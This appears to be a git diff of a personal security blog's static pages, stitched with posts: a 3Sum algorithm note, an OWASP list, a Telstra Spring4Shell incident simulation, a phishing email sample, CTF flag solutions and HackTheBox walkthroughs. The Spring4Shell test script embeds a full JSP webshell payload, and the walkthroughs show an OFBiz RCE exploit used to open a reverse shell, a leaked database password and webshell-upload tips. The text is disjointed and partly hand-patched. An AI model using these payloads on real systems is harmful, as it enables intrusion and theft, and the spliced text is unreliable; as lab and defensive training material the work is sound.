+方法1:枚举所有方法,时间复杂度n^3,会超时
+方法2:排序
+哈希法(2等1)
+循环i,j 此时 t=0-nums[i]-nums[j]
+根据哈希,判断t是否在数组中出现过
+注意:需要去重
+方法3:排序
+双指针(1等2)
+t=0-nums[i]-nums[j]
+思路:
+固定i指针,j,k分别在两端,交替向中间靠拢(比较t)
+注意:去重
+代码12345678910 ...
\ No newline at end of file
diff --git a/page/6/index.html b/page/6/index.html
new file mode 100644
index 000000000..290e2a9ed
--- /dev/null
+++ b/page/6/index.html
@@ -0,0 +1,417 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/page/7/index.html b/page/7/index.html
new file mode 100644
index 000000000..3b0344b7d
--- /dev/null
+++ b/page/7/index.html
@@ -0,0 +1,367 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/page/8/index.html b/page/8/index.html
new file mode 100644
index 000000000..367aa999f
--- /dev/null
+++ b/page/8/index.html
@@ -0,0 +1,515 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
+The OWASP Top 10 is a standard awareness document for developers and web application security. It represents a broad consensus about the most critical security risks to web applications.
+
+
+注入
+失效的身份验证
+敏感信息泄露
+XML外部实体(XXE)
+失效的访问控制
+安全配置错误
+跨站脚本(XSS)
+不安全的反序列化
+使用含有已知漏洞的组件
+不足的日志记录和监控
+
+
+
+Injection. Injection flaws, such as SQL, NoSQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into execu ...
\ No newline at end of file
diff --git a/page/9/index.html b/page/9/index.html
new file mode 100644
index 000000000..b1f918d74
--- /dev/null
+++ b/page/9/index.html
@@ -0,0 +1,332 @@
+h4m5t's Blog - love is good
+
+
+
+
+
+
+
+
+
+
+
Telstra is Australia’s largest telecommunications company, offering services like mobile phones, internet, and data solutions to millions of customers nationwide. Known for its reliability and innovation, Telstra connects people and businesses, ensuring smooth and effective communication.
The Telstra Cybersecurity Job Simulation Project is a training program designed to replicate real-world cybersecurity challenges. Participants work through tasks such as detecting threats, responding to incidents, collaborating with different teams, and implementing technical solutions to protect digital systems. This simulation helps individuals build the skills needed to defend against cyber attacks and keep Telstra’s services secure.
In the dynamic realm of cybersecurity, organizations must remain vigilant and responsive to emerging threats to safeguard their infrastructure and services. This blog post presents a detailed case study of how Telstra’s Security Operations Centre (SOC) effectively responded to a Spring4Shell (CVE-2022-22965) malware attack targeting the NBN Connection service. We will walk through the entire incident response process, encompassing initial threat triage, inter-team communication, technical mitigation using Python-based firewall rules, troubleshooting, and a post-incident analysis.
Task 1: Initial Threat Triage and Notification
Incident Identification and Severity Assessment
On March 20th, 2024, at 14:20 UTC, the SOC detected unusual activity targeting the NBN Connection service (nbn.external.network), which operates on Spring Framework 5.3.0. The attack manifested through multiple malicious POST requests to the /tomcatwar.jsp endpoint, indicating an exploitation attempt of the Spring4Shell vulnerability.
Affected Infrastructure and Prioritization
An analysis of firewall logs revealed that the NBN Connection service was under direct attack. Given its critical role in providing high-speed internet connectivity, the incident was classified as P1 - Critical. Other services, including Mobile Tower Connection, Home & Business Lines, and ADSL Connect, were evaluated and found to be unaffected based on the current logs. Nonetheless, continuous monitoring was recommended to ensure comprehensive security.
Notification of the Respective Team
Prompt communication was essential to coordinate an effective response. An urgent email was drafted and sent to the NBN Team, alerting them of the ongoing attack and the necessity to initiate immediate incident response measures.
Email to NBN Team:
```
From: Telstra Security Operations
To: NBN Team (nbn@email)
Subject: Urgent: Malware Attack Impacting NBN Connection Service
---
Body:

Hello NBN Team,

At **14:20 on March 20, 2024**, a malware attack targeting the **NBN Connection service** running on the **Spring Framework** was detected, resulting in service disruption and impaired functionality. This incident has been assessed as **P1 - Critical** and requires the immediate initiation of incident response measures to restore services and prevent further impact.

Please review the relevant logs promptly and take the necessary mitigation actions. If you need assistance or have any questions, feel free to contact us.

Kind regards,
Telstra Security Operations
```
This communication ensured that the NBN Team was promptly informed, enabling them to take swift action to mitigate the threat.
Task 2: Collaborating with the Networks Team to Mitigate the Attack
Analyzing Firewall Logs and Identifying Attack Patterns
Upon identifying the attack, the SOC conducted a thorough analysis of the firewall logs. The logs indicated that the attack originated from multiple IP addresses within the AU region, utilizing specific malicious payloads designed to exploit the Spring4Shell vulnerability. The attack pattern involved POST requests to the /tomcatwar.jsp endpoint with parameters like class.module.classLoader.resources.context.parent.pipeline.first.pattern and others.
Drafting an Email to the Networks Team
To address the distributed nature of the attack without blocking individual IP addresses, the SOC collaborated with the Networks Team to implement a firewall rule that filters incoming traffic based on the identified malicious request characteristics.
```
From: Telstra Security Operations
To: Networks Team (networks@email)
Subject: Create Firewall Rule to Mitigate Spring4Shell Attack
---
Body:

Hello Networks Team,

We would like to request the creation of a firewall rule and provide you with more information about the ongoing attack.

**Type of Attack:** Our analysis of the firewall logs indicates a Spring4Shell (CVE-2022-22965) malware attack targeting the **NBN Connection service (nbn.external.network)**. The attack involves multiple POST requests to `/tomcatwar.jsp` with malicious payloads designed to exploit the Spring Framework vulnerability.

**Characteristics to Block:**
- **Request Path:** `/tomcatwar.jsp`
- **HTTP Method:** `POST`
- **Specific Payload Patterns:** Requests containing parameters such as `class.module.classLoader.resources.context.parent.pipeline.first.pattern` and related malicious payloads.

**Request:** Please implement a firewall rule to block incoming POST requests to the `/tomcatwar.jsp` endpoint and inspect for the presence of the aforementioned malicious payload patterns in the request data. This should help mitigate the distributed nature of the attack by targeting the specific exploit characteristics rather than individual IP addresses.

**Additional Information:** The attack has been distributed across multiple IP addresses within the AU region. Blocking the specific request patterns will provide a more effective mitigation strategy. Attached is a proof of concept payload that demonstrates how the attacker scripts this attack, which may aid in refining the firewall rules.

For any questions or issues, don't hesitate to reach out to us.

Kind regards,
Telstra Security Operations
```
This email provided the Networks Team with the necessary details to develop targeted firewall rules, enhancing the organization’s defensive measures against the attack.
Task 3: Implementing Firewall Rules with Python
Developing a Python-Based Firewall Rule
To mitigate the attack effectively, a Python script was developed to implement a firewall rule that filters incoming traffic based on the identified malicious request characteristics. The goal was to block malicious POST requests to the /tomcatwar.jsp endpoint without relying on IP-based blocking, which is less effective against distributed attacks.
```python
# firewall_server.py
# The excerpt lost its imports, the handler class header, MALICIOUS_PARAMS and
# the allow/block helpers; they are filled in here so the script runs as described.
import sys
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

host = "localhost"
port = 8000

# Parameter names carried by the Spring4Shell (CVE-2022-22965) payload described above
MALICIOUS_PARAMS = [
    "class.module.classLoader.resources.context.parent.pipeline.first.pattern",
    "class.module.classLoader.resources.context.parent.pipeline.first.suffix",
    "class.module.classLoader.resources.context.parent.pipeline.first.directory",
    "class.module.classLoader.resources.context.parent.pipeline.first.prefix",
    "class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat",
]


def block_request(handler):
    # Reject the request and record the source address
    print("[!] Blocked malicious POST from %s" % handler.client_address[0])
    handler.send_response(403)
    handler.send_header("Content-Type", "text/plain")
    handler.end_headers()
    handler.wfile.write(b"Forbidden\n")


def allow_request(handler):
    # Let the request through (a real gateway would forward it upstream)
    handler.send_response(200)
    handler.send_header("Content-Type", "text/plain")
    handler.end_headers()
    handler.wfile.write(b"OK\n")


class ServerHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        # Check if the request path is the targeted endpoint
        if self.path == '/tomcatwar.jsp':
            # Retrieve and decode the request body
            content_length = int(self.headers.get('Content-Length', 0))
            body = self.rfile.read(content_length).decode('utf-8')
            params = urllib.parse.parse_qs(body)
            # Check for the presence of any malicious parameters
            if any(param in params for param in MALICIOUS_PARAMS):
                block_request(self)
                return
            else:
                allow_request(self)
                return
        else:
            # For all other POST requests, allow them
            allow_request(self)

    def log_message(self, format, *args):
        # Override to suppress default logging
        return


if __name__ == "__main__":
    server = HTTPServer((host, port), ServerHandler)
    print("[+] Firewall Server")
    print("[+] HTTP Web Server running on: %s:%s" % (host, port))
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        pass
    server.server_close()
    print("[+] Server terminated. Exiting...")
    sys.exit(0)
```
Testing the Firewall Rule
A complementary script, test_requests.py, was utilized to simulate both malicious and benign requests to ensure the firewall rule functioned as intended.
```python
# Test Requester.py
# www.theforage.com - Telstra Cyber Task 3
# Test Requester

import http.client

host = "localhost"
port = 8000


def main():
    target = f"{host}:{port}"
    print(f"[+] Beginning test requests to: {target}")
    successful_responses = 0

    for x in range(5):
        payload = (
            "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if("
            "%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di."
            "getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20"
            "%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%"
            "7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module."
            "classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader."
            "resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent."
            "pipeline.first.fileDateFormat="
        )
        print(f"[{x + 1}/5]: Making test request to {target} with payload: {payload}")
        conn = http.client.HTTPConnection(target)
        # The send/receive part was cut from the excerpt: post the form-encoded
        # body to the endpoint the firewall handler inspects and read its verdict
        conn.request("POST", "/tomcatwar.jsp", body=payload,
                     headers={"Content-Type": "application/x-www-form-urlencoded"})
        response = conn.getresponse()
        print(f"    -> HTTP {response.status} {response.reason}")
        # A 200 means the firewall let the malicious request through;
        # with the rule in place this should stay at 0/5
        if response.status == 200:
            successful_responses += 1
        conn.close()

    print("[+] Test completed.")
    print(f"[+] Successful responses: {successful_responses}/5")


if __name__ == "__main__":
    main()
```
Troubleshooting: Addressing Port Conflicts
During the deployment of the firewall_server.py script, an error was encountered:
```
OSError: [Errno 48] Address already in use
```
This indicated that port 8000 was occupied by another process, preventing the firewall server from binding to it. The following steps were undertaken to resolve the issue:
Identifying the Occupying Process:
Using the lsof command:
```
lsof -i :8000
```
This command revealed the Process ID (PID) of the application using port 8000.
Terminating the Conflicting Process:
The identified process was terminated using the kill command:
```
kill -9 <PID>
```
Replace <PID> with the actual Process ID obtained from the previous step.
Verifying Port Availability:
Ensuring that port 8000 was free by rerunning the lsof command:
```
lsof -i :8000
```
No output indicates that the port is now free.
Restarting the Firewall Server:
After freeing up the port, the firewall_server.py script was successfully executed:
```
python3 firewall_server.py
```
The server started without issues, indicating that it was listening on the designated port.
Alternative Solution: Changing the Server Port
If port 8000 remains consistently in use, an alternative approach involves changing the server to listen on a different port (e.g., 8080). This requires updating both the firewall_server.py and test_requests.py scripts to reflect the new port number.
Edit firewall_server.py:
Modify the port variable:
```
host = "localhost"
port = 8080
```
Edit test_requests.py:
Update the port number accordingly:
```
host = "localhost"
port = 8080
```
Run the Modified Server:
```
python3 firewall_server.py
```
Run the Test Requester:
```
python3 test_requests.py
```
This ensures that the firewall rule is correctly applied on the new port.
Task 4: Incident Postmortem and Lessons Learned
Incident Postmortem: Spring4Shell Malware Attack on NBN Connection Service
Summary
On March 20th, 2024, at 14:20 UTC, Telstra’s Security Operations Centre (SOC) detected a P1 - Critical malware attack targeting the NBN Connection service (nbn.external.network), operating on Spring Framework 5.3.0. The attack involved multiple malicious POST requests to the /tomcatwar.jsp endpoint, exploiting the Spring4Shell (CVE-2022-22965) vulnerability. The incident was identified through firewall log analysis and was successfully mitigated two hours after detection by implementing a targeted firewall rule. Key teams involved in the response included the Security Operations Centre and the NBN Team.
Impact
Service Disruption: The NBN Connection service experienced significant downtime, impairing high-speed internet connectivity for customers relying on this infrastructure.
Operational Impairment: Critical services dependent on the NBN Connection, such as remote communications and business operations, were temporarily affected.
Potential Data Exposure: Although no data breaches were confirmed, the nature of the attack posed a risk of unauthorized command execution and potential data exfiltration.
Detection
The incident was discovered through routine monitoring of firewall logs by the SOC. Analysis revealed a pattern of multiple POST requests to the /tomcatwar.jsp endpoint originating from several IP addresses within the AU region. These requests contained specific malicious payloads characteristic of the Spring4Shell vulnerability, including parameters like class.module.classLoader.resources.context.parent.pipeline.first.pattern and others designed to execute remote commands.
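The log-analysis side of that triage (the same pattern the Task 2 email describes), as an added example that is not part of the simulation or the page's scripts: it parses constructed firewall log lines (the field layout and the source addresses are assumptions), flags a request on the class.module.classLoader. parameter prefix rather than on the one endpoint named above, which generalizes the indicator to any path, and reports the distinct sources that make an IP-based block the wrong tool.

```python
import re
from collections import Counter
from urllib.parse import parse_qs

# Constructed sample firewall log lines (not taken from the page); the field
# layout "ts src= method= path= body=" and the addresses are assumptions.
LOG_LINES = [
    '2024-03-20T14:20:01Z src=203.0.113.10 method=POST path=/tomcatwar.jsp '
    'body="class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di'
    '&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp'
    '&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="',
    '2024-03-20T14:20:03Z src=198.51.100.7 method=POST path=/tomcatwar.jsp '
    'body="class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps%2FROOT"',
    '2024-03-20T14:20:04Z src=203.0.113.10 method=GET path=/ body=""',
    '2024-03-20T14:20:09Z src=192.0.2.55 method=POST path=/login body="username=alice&remember=1"',
    '2024-03-20T14:21:30Z src=192.0.2.56 method=POST path=/api/order '
    'body="class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar"',
]

LINE_RE = re.compile(
    r'^(?P<ts>\S+) src=(?P<src>\S+) method=(?P<method>\S+) '
    r'path=(?P<path>\S+) body="(?P<body>[^"]*)"$'
)

# CVE-2022-22965 abuses Spring data binding to reach the Tomcat class loader;
# every binder parameter in the exploit starts with this prefix, whatever the URL.
CLASSLOADER_PREFIX = "class.module.classLoader."


def parse_line(line):
    """Return the log fields as a dict, or None for a line in another format."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def is_spring4shell_attempt(event):
    """True when a POST carries any parameter bound to class.module.classLoader.*."""
    if event["method"] != "POST":
        return False
    # keep_blank_values so a trailing "fileDateFormat=" still counts as a parameter
    params = parse_qs(event["body"], keep_blank_values=True)
    return any(name.startswith(CLASSLOADER_PREFIX) for name in params)


def triage(lines):
    """Summarise the attempts in a batch of log lines for the triage step."""
    hits = [e for e in map(parse_line, lines) if e and is_spring4shell_attempt(e)]
    sources = sorted({e["src"] for e in hits})
    return {
        "hits": len(hits),
        "sources": sources,
        "paths": Counter(e["path"] for e in hits),
        # More than one source means an IP block is the wrong tool; a
        # pattern-based rule (method + path + parameter names) is what fits.
        "distributed": len(sources) > 1,
    }


if __name__ == "__main__":
    summary = triage(LOG_LINES)
    print(f"[+] Spring4Shell attempts: {summary['hits']}")
    print(f"[+] Distinct sources: {', '.join(summary['sources'])}")
    print(f"[+] Targeted paths: {dict(summary['paths'])}")
    print(f"[+] Distributed attack: {summary['distributed']}")
```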
Root Cause
The root cause of the incident was the exploitation of the Spring4Shell (CVE-2022-22965) vulnerability within the Spring Framework 5.3.0 used by the NBN Connection service. Attackers crafted malicious POST requests to the /tomcatwar.jsp endpoint, embedding payloads that leveraged this vulnerability to execute arbitrary commands on the server, leading to service disruption and impaired functionality.
Resolution
To mitigate the attack, the SOC collaborated with the Networks Team to implement a targeted firewall rule using a Python-based HTTP server (firewall_server.py). The rule specifically blocked incoming POST requests to the /tomcatwar.jsp endpoint that contained the identified malicious parameters. This measure effectively halted the ongoing attack within two hours of its initiation, restoring the NBN Connection service to operational status and preventing further unauthorized access.
Action Items
Immediate Actions:
Firewall Rule Implementation: Successfully deployed a Python-scripted firewall rule to block malicious POST requests targeting the /tomcatwar.jsp endpoint.
Service Restoration: Coordinated with the Networks Team to ensure the NBN Connection service was promptly restored to normal operations.
Short-Term Actions:
Vulnerability Patching: Upgrade the Spring Framework to the latest version to eliminate the exploited Spring4Shell vulnerability.
Enhanced Monitoring: Increase the frequency and depth of firewall log reviews to detect similar or new attack patterns more swiftly.
Incident Documentation: Complete detailed documentation of the incident for future reference and compliance purposes.
Long-Term Actions:
Security Training: Conduct training sessions for the SOC and relevant teams on identifying and responding to similar vulnerabilities and attack vectors.
Comprehensive Security Audit: Perform a thorough security audit of all critical services to identify and remediate potential vulnerabilities.
Automation of Response Mechanisms: Develop automated scripts and tools to detect and mitigate such attacks in real-time, reducing response times.
Collaboration with Development Teams: Work closely with development teams to ensure secure coding practices are followed, particularly when using frameworks like Spring.
Future Prevention:
Regular Updates and Patching: Establish a routine schedule for updating and patching all software frameworks and dependencies to minimize vulnerability exposure.
Advanced Threat Detection Systems: Invest in more sophisticated threat detection and prevention systems that can identify and block complex attack patterns.
Incident Response Drills: Conduct regular incident response drills to ensure all teams are prepared to handle similar attacks efficiently.
Lessons Learned
Proactive Monitoring: Continuous and proactive monitoring of firewall logs is essential in the early detection of potential threats.
Collaborative Response: Effective communication and collaboration between the SOC and infrastructure teams are critical in swiftly mitigating attacks.
Automation and Scripting: Utilizing scripting languages like Python for developing automated firewall rules can significantly enhance response times and accuracy.
Regular Patching: Keeping all software frameworks and dependencies up-to-date is vital in preventing exploitation of known vulnerabilities.
Comprehensive Documentation: Maintaining detailed incident postmortems aids in future governance, risk management, and compliance efforts while educating the team on handling similar incidents.
Conclusion
This incident underscored the importance of robust monitoring, swift response mechanisms, and collaborative efforts in combating sophisticated malware attacks. By implementing targeted firewall rules and adhering to best practices in incident response, Telstra effectively mitigated the Spring4Shell attack, ensuring the continuity of its critical services and reinforcing its commitment to cybersecurity excellence.
Prepared by: Telstra Security Operations Date: April 27, 2024
```
Hello dear user, I am Larry Page and I am delighted to announce to you that=
 you are the 99999999th GMAIL account and for that we want to reward you. =
You've earned $1,000,000. To claim your prize open the attached file.
----_NmP-426c22a2e0d8fc9a-Part_2
Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: quoted-printable

<p>Hello dear user, I am Larry Page and I am delighted to announce to you =
that you are the 99999999th GMAIL account and for that we want to reward =
you. You've earned $1,000,000. To claim your prize open the attached file.=
<br></p>
----_NmP-426c22a2e0d8fc9a-Part_2--
```
```bash
#!/usr/bin/env bash
# Extract nested ZIP files in a loop. The starting archive was not part of the
# excerpt; here it is taken from the first argument (an assumption).
filename="${1:?usage: $0 <archive.zip>}"

while [ -f "$filename" ]; do
    # Extract everything in the current ZIP file
    unzip -o "$filename"
    # Remove the archive just extracted; otherwise find returns it again
    # and the loop re-extracts the same file forever
    rm -f "$filename"
    # Find the next ZIP file
    next_zip=$(find . -name "*.zip" | head -n 1)
    # If a new ZIP file was found, update filename, otherwise leave the loop
    if [ -n "$next_zip" ]; then
        filename="$next_zip"
    else
        echo "Extraction complete or no more ZIP files found."
        break
    fi
done
```
```
~/Desktop/testtest/ hexdump -C message.txt
00000000  ff fe 68 00 fe ff 00 65  ff fe 32 00 fe ff 00 30  |..h....e..2....0|
00000010  ff fe 32 00 fe ff 00 33  ff fe 7b 00 fe ff 00 75  |..2....3..{....u|
00000020  ff fe 37 00 fe ff 01 92  ff fe 5f 00 fe ff 00 62  |..7......._....b|
00000030  ff fe 30 00 fe ff 00 6d  ff fe 35 00 fe ff 00 73  |..0....m..5....s|
00000040  ff fe 5f 00 fe ff 00 38  ff fe 72 00 fe ff 15 f1  |.._....8..r.....|
00000050  ff fe 5f 00 fe ff 00 6e  ff fe 30 00 fe ff 00 37  |.._....n..0....7|
00000060  ff fe 5f 00 fe ff 00 38  ff fe 63 31 fe ff 00 77  |.._....8..c1...w|
00000070  ff fe 61 00 fe ff 00 79  ff fe 35 00 fe ff 00 5f  |..a....y..5...._|
00000080  ff fe 31 00 fe ff 00 67  ff fe 6e 00 fe ff 00 30  |..1....g..n....0|
00000090  ff fe 72 00 fe ff 15 f1  ff fe 64 00 fe ff 00 7d  |..r.......d....}|
000000a0
```
Extracted flag:
```
he2023{u7_b0m5s_8r_n07_8c1way5_1gn0rd}
```
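How the bytes in that hexdump decode, as an added example that is not part of the original write-up: every UTF-16 code unit carries its own byte-order mark, alternating FF FE and FE FF, so a standard decoder, which honours only the first BOM, comes out of sync, while a decoder that re-reads the BOM per unit recovers the text. The byte string is constructed inline from the hexdump above.

```python
# Constructed inline from the hexdump of message.txt shown above.
MESSAGE = bytes.fromhex(
    "fffe6800feff0065fffe3200feff0030"
    "fffe3200feff0033fffe7b00feff0075"
    "fffe3700feff0192fffe5f00feff0062"
    "fffe3000feff006dfffe3500feff0073"
    "fffe5f00feff0038fffe7200feff15f1"
    "fffe5f00feff006efffe3000feff0037"
    "fffe5f00feff0038fffe6331feff0077"
    "fffe6100feff0079fffe3500feff005f"
    "fffe3100feff0067fffe6e00feff0030"
    "fffe7200feff15f1fffe6400feff007d"
)

BOM_LE = b"\xff\xfe"
BOM_BE = b"\xfe\xff"


def decode_per_unit_bom(data: bytes) -> str:
    """Decode 4-byte groups of <BOM><code unit>, switching endianness per group."""
    if len(data) % 4:
        raise ValueError("stream is not a whole number of BOM+unit groups")
    chars = []
    for off in range(0, len(data), 4):
        bom, unit = data[off:off + 2], data[off + 2:off + 4]
        if bom == BOM_LE:
            chars.append(unit.decode("utf-16-le"))
        elif bom == BOM_BE:
            chars.append(unit.decode("utf-16-be"))
        else:
            raise ValueError(f"no byte-order mark at offset {off:#x}")
    return "".join(chars)


def decode_naively(data: bytes) -> str:
    """What bytes.decode('utf-16') does with this stream: the first BOM selects
    little-endian for everything, each later BOM becomes U+FEFF or U+FFFE, and
    the big-endian units are read byte-swapped, giving 79 mostly wrong units."""
    return data.decode("utf-16")


def ascii_only(text: str) -> str:
    """Drop the non-ASCII units (the ones the hexdump's ASCII column shows as '.')."""
    return "".join(c for c in text if 0x20 <= ord(c) < 0x7F)


if __name__ == "__main__":
    decoded = decode_per_unit_bom(MESSAGE)
    print(repr(decoded))
    print(ascii_only(decoded))
    print(repr(decode_naively(MESSAGE)))
```

The three non-ASCII units (U+0192, U+15F1 twice, U+3163) are the bytes the ASCII column renders as dots or, for `63 31`, as `c1`.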
Rotational
Challenge:
```
96a_abL_?b04c?0Cbc50C_E_C03c4<HcC5DN
```
The task is to decrypt this text (the flag). Initial attempts with common rotation ciphers such as ROT13 did not work; the hint "the rotor must have been too fast!" suggests a more complex rotation scheme is in use.
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Invalidated]
└─# nmap -sC -sV $(cat ip.txt)
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-30 23:26 AEST
Nmap scan report for invalidated.htb (10.129.233.58)
Host is up (0.015s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Sign up
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.09 seconds
```
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Rental]
└─# nmap -sC -sV $(cat ip.txt)
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-29 19:58 AEST
Nmap scan report for 10.129.96.12
Host is up (0.010s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: Mixt
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.15 seconds
```
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Rental]
└─# dirsearch -u "http://10.129.96.12" -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict
```
```
www-data@rental:/var/www/html/admin$ mysql -u manager -p'password#1' car_rental_db
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 217
Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [car_rental_db]> SHOW GRANTS FOR 'manager'@'localhost';
+---------------------------------------------------------------------------------------------------------------+
| Grants for manager@localhost                                                                                  |
+---------------------------------------------------------------------------------------------------------------+
| GRANT FILE ON *.* TO `manager`@`localhost` IDENTIFIED BY PASSWORD '*A778F55EAE542DA23ED0F6351B01262EFFD3BBB0' |
| GRANT ALL PRIVILEGES ON `car_rental_db`.* TO `manager`@`localhost`                                            |
+---------------------------------------------------------------------------------------------------------------+
2 rows in set (0.000 sec)
```
Tips: There are at least two exploitable vulnerabilities in HelpDeskZ 1.0.2. There's an authenticated SQL injection that will allow you to read a SHA1 hash from the database and crack it, allowing for SSH access. There's also an arbitrary file upload vulnerability that will allow you to upload a webshell and get execution that way. Either way, you end up with a shell as the same user.
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]
└─# nmap -p- $IP
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-15 20:43 AEST
Nmap scan report for bizness.htb (10.129.232.1)
Host is up (0.040s latency).
Not shown: 65531 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
443/tcp   open  https
41845/tcp open  unknown
Nmap done: 1 IP address (1 host up) scanned in 12.65 seconds
```
```
echo "10.129.232.1 bizness.htb" | sudo tee -a /etc/hosts
```
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]
└─# update-alternatives --config java
There are 3 choices for the alternative java (providing /usr/bin/java).

Press <enter> to keep the current choice[*], or type selection number: 1
update-alternatives: using /usr/lib/jvm/java-11-openjdk-arm64/bin/java to provide /usr/bin/java (java) in manual mode

┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]
└─# java --version
openjdk 11.0.20-ea 2023-07-18
OpenJDK Runtime Environment (build 11.0.20-ea+7-post-Debian-1)
OpenJDK 64-Bit Server VM (build 11.0.20-ea+7-post-Debian-1, mixed mode)
```
Start tcpdump:
```
sudo tcpdump -i 2 icmp
```
Run the PoC:
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]
└─# python3 exploit.py https://bizness.htb rce "ping -c 5 10.10.14.8"
Not Sure Worked or not
```
Check the captured packets:
```
┌──(root@kali)-[/home/h4m5t/Desktop]
└─# tcpdump -i 2 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on any, link-type LINUX_SLL2 (Linux cooked v2), snapshot length 262144 bytes
21:47:38.693694 tun0  In  IP bizness.htb > 10.10.14.8: ICMP echo request, id 55668, seq 1, length 64
21:47:38.693728 tun0  Out IP 10.10.14.8 > bizness.htb: ICMP echo reply, id 55668, seq 1, length 64
21:47:39.695235 tun0  In  IP bizness.htb > 10.10.14.8: ICMP echo request, id 55668, seq 2, length 64
21:47:39.695274 tun0  Out IP 10.10.14.8 > bizness.htb: ICMP echo reply, id 55668, seq 2, length 64
```
The echo requests confirm the RCE worked; the next step is a reverse shell.
First start an nc listener, then run the exploit:
```
nc -nlvp 4444
```
```
┌──(root@kali)-[/home/h4m5t/Desktop/HTB/Bizness]
└─# python3 exploit.py https://bizness.htb shell 10.10.14.8:4444
Not Sure Worked or not
```
```
ofbiz@bizness:/opt/ofbiz/framework/security/config$ cat security.properties | grep hash
# -- specify the type of hash to use for one-way encryption, will be passed to java.security.MessageDigest.getInstance() --
password.encrypt.hash.type=SHA
```
```
cat HashCrypt.java
/*******************************************************************************
 * Licensed to the Apache Software Foundation (ASF) under one
 * or more contributor license agreements.  See the NOTICE file
 * distributed with this work for additional information
 * regarding copyright ownership.  The ASF licenses this file
 * to you under the Apache License, Version 2.0 (the
 * "License"); you may not use this file except in compliance
 * with the License.  You may obtain a copy of the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing,
 * software distributed under the License is distributed on an
 * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
 * KIND, either express or implied.  See the License for the
 * specific language governing permissions and limitations
 * under the License.
 *******************************************************************************/
package org.apache.ofbiz.base.crypto;
```

```java
private static boolean doCompareTypePrefix(String crypted, String defaultCrypt, byte[] bytes) {
    int typeEnd = crypted.indexOf("}");
